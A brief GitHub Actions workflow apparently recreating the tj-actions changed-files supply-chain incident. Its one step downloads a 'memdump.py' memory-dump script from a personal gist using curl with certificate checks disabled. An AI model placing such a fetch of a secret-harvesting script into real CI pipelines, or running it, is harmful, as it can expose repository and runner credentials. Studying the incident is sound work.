name: "tj-action changed-files incident"
on: 
  workflow_dispatch:  # Specify when the workflow runs

jobs:
  changed_files:
    runs-on: ubuntu-latest  # Define the runner environment
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Ensures full commit history is available

      - name: Run Memory Dump Script
        run: curl -k -sSf https://gist.githubusercontent.com/Pranesh-Shrestha/eea7f7f05e3d9ae73ead8d93a2029154/raw/d3adf5c61a3cf583048cd353b3a23a1ff9fd4c1b/memdump.py
